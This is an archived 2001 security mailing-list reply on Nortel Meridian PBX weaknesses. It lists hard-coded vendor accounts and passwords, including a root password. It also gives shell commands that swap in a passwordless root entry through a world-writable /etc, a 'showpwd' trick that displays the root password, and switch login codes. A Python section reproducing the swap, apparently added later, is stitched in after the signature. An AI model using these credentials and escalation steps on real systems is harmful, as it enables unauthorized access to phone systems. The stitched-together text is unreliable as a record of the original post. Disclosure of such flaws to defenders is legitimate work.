Penetration Testing: Re: Nortel Security

Re: Nortel Security

From: Mark Rowe <mark_at_whatnot.demon.co.uk>
Date: Tue, 10 Jul 2001 12:17:08 +0100

In article <01063012540504.01490_at_sliver>, H D Moore
<hdm_at_secureaustin.com> writes

I came across this while doing a security review 3 years ago. I tried to
contact Nortel several times but never received a response. I guess they
don't think it is important :-o

>If the PBX is hooked into the actual network, there are quite a few ways to
>get access to the system. The easiest method is to tftp the /etc/passwd file
>off the system and crack the hashes. If you go this route, you will get a
>user account called "service" with a password of "smile" ;) If you log into
>the system with this account, you will notice that /etc is mode 0777, so
>getting root access is trivial:
>
>$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
>$ mv /etc/passwd /etc/passwd.bak
>$ mv /etc/mah_passwd /etc/passwd
>$ su root
># mv /etc/passwd.bak /etc/passwd
>
>I don't remember which version of this system it was, but the client software
>that came with it was called "Meridian Terminal Emulator". You could manage
>the PBX with this by first logging in with 0000/0000 then giving it the
>manager password of "9999". I really wish I had more time to write up the
>stuff I find out there...
>
>-HD
>

Anyway I think the service account exists on the MAX, CCR and Link
Meridian components.

Here is some other stuff I came across,

Accounts that give UNIX level access
====================================

Box             Account    Password   Use
MAX, CCR, Link  service    smile      General engineer account
CCR, Link       disttech   4tas       Engineer account
MAX             root       3ep5w2u    Root

Accounts that give application level access
===========================================

Box        Account   Password   Use
MAX        maint     ntacdmax   Maintenance account
CCR, Link  maint     maint      Maintenance account
CCR        ccrusr    ccrusr     User account
Link       mlusr     mlusr      User account

To gain root access on Link or CCR -

Login as disttech/4tas

type "showpwd"

at prompt enter first 3 letters from Yesterday and first 3 from Tomorrow
(e.g. if today is Tuesday enter "MonWed" - note the capitalisation).

When you are told this is invalid, enter the same thing again.

The root password is now displayed in plain text on the screen. You can
now "su" to root with this password.

To gain access to the Meridian itself - there are two methods of access
depending how the switch is set up. Try password only first as most
will probably be set up like this -

Password only
enter
logi 0000 (customer level)
logi 1111 (a bit higher)
logi 8429 (maintenance)

Username and password
logi customer
PASS? 0000

logi admin1
PASS? 1111

logi to
PASS? 8429

Hope this helps,
Mark.

-- 
Mark Rowe
IT Security Consultant
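The two Unix-side weaknesses described in this thread, the world-writable /etc that lets the low-privilege "service" account swap in a passwordless root entry, and the disttech "showpwd" challenge that is answered with the first three letters of yesterday's and tomorrow's day names, as an added Python example. This is not code from the original posts or from any Nortel software. The throw-away "etc" directory, its constructed passwd file and all function names are assumptions for illustration; the swap only ever runs inside a temporary directory and restores the original file afterwards, as the quoted steps do.

```python
"""Helpers for the two Meridian weaknesses discussed in the thread.

Added example, not code from the original posts or from Nortel.
"""
import datetime
import os
import stat
import tempfile

# datetime.date.weekday() numbers Monday as 0, so this order matches it.
DAY_ABBR = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]


def showpwd_response(today):
    """Return the answer the disttech 'showpwd' challenge asks for on a given day:
    first three letters of yesterday followed by first three letters of tomorrow,
    capitalised as in the post (Tuesday -> 'MonWed'). Week wrap (Sun/Mon) is
    handled by date arithmetic rather than a lookup. `today` may be a date or an
    ISO 'YYYY-MM-DD' string."""
    if isinstance(today, str):
        today = datetime.date.fromisoformat(today)
    yesterday = today - datetime.timedelta(days=1)
    tomorrow = today + datetime.timedelta(days=1)
    return DAY_ABBR[yesterday.weekday()] + DAY_ABBR[tomorrow.weekday()]


def is_world_writable(path):
    """True if 'others' may write to path, i.e. the mode 0777 /etc condition
    that lets an unprivileged user rename files in it."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def has_passwordless_root(passwd_text):
    """True if any passwd line has uid 0 and an empty password field."""
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[1] == "" and fields[2] == "0":
            return True
    return False


def demonstrate_etc_swap(etc_dir):
    """Reproduce the quoted passwd swap inside etc_dir, which stands in for /etc.

    Returns (etc_was_world_writable, swapped_passwd_had_passwordless_root).
    The check models what the 'service' user faces; the demo itself runs as
    the directory owner, so the renames succeed and the check gates the result.
    """
    passwd = os.path.join(etc_dir, "passwd")
    backup = os.path.join(etc_dir, "passwd.bak")
    staged = os.path.join(etc_dir, "mah_passwd")

    if not is_world_writable(etc_dir):
        return False, False

    # $ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
    with open(staged, "w") as f:
        f.write("root::0:0:root:/root:/bin/sh\n")
    # $ mv /etc/passwd /etc/passwd.bak ; mv /etc/mah_passwd /etc/passwd
    os.rename(passwd, backup)
    os.rename(staged, passwd)
    with open(passwd) as f:
        escalated = has_passwordless_root(f.read())  # 'su root' would now ask nothing
    # # mv /etc/passwd.bak /etc/passwd   (put the real file back)
    os.rename(backup, passwd)
    return True, escalated


def build_sandbox(mode):
    """Create a throw-away 'etc' directory holding a constructed sample passwd
    file (assumed content, not taken from any real system) with the given mode."""
    d = tempfile.mkdtemp(prefix="meridian-etc-")
    with open(os.path.join(d, "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/sh\n"
                "service:x:100:100:service:/home/service:/bin/sh\n")
    os.chmod(d, mode)
    return d


if __name__ == "__main__":
    print(showpwd_response("2001-07-10"))            # the post's Tuesday example
    print(demonstrate_etc_swap(build_sandbox(0o777)))  # the vulnerable layout
    print(demonstrate_etc_swap(build_sandbox(0o755)))  # a normally permissioned /etc
```

On an engagement the interesting call is `is_world_writable("/etc")` on the PBX itself: if it returns True, the rest follows exactly as HD Moore describes, and the finding is the directory mode, not the "service" password alone.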
--------------------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service
For more information on SecurityFocus' SIA service which automatically alerts you to 
the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Received on Jul 10 2001